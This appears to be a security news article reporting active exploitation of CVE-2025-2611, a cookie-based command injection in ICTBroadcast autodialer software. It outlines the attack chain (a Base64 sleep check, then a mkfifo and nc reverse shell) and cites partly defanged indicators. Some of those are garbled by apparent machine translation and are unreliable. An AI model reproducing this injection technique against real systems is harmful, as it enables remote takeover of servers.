Cybersecurity researchers have revealed that a critical security flaw affecting ICT Innovations’ autodialer software, ICTBroadcast, is being exploited in the wild.
The vulnerability, assigned CVE identifier CVE-2025-2611 (CVSS score: 9.3), is related to improper input validation when the call center application does not securely pass session cookie data to shell processing, which could lead to unauthenticated remote code execution.
This allows an attacker to inject shell commands into session cookies running on the vulnerable server. This security flaw affects ICTBroadcast versions 7.4 and below.
“An attacker is leveraging unauthenticated command injection on ICTBroadcast via the BROADCAST cookie to remotely execute code,” VulnCheck’s Jacob Baines said in a Tuesday alert. “There are approximately 200 online instances published.”
The cybersecurity company announced on October 11th that it had detected a live exploit. The attack occurred in two stages, starting with a time-based exploit check, followed by an attempt to set up a reverse shell.
To do so, an unknown attacker has been observed injecting a Base64-encoded command that translates to “sleep3” into the BROADCAST cookie of a specially crafted HTTP request to confirm command execution and create a reverse shell.
“The attacker used a local protocol[.]net URL in the mkfifo + nc payload, and also established a connection to 143.47.53[.]For other payloads, there are 106,” Baines noted.
It is worth noting that both the use of the localto.net link and the IP address were previously reported by Fortinet in connection with an email campaign targeting organizations in Spain, Italy, and Portugal to distribute a Java-based remote access Trojan (RAT) named Ratty RAT.
VulnCheck noted that the overlap in these metrics suggests the possibility of reusing or sharing tools. At this time, there is no information regarding the patch status for this flaw. Hacker News has reached out to ICT Innovations for further comment. I will update the article if I receive a response.
Source link
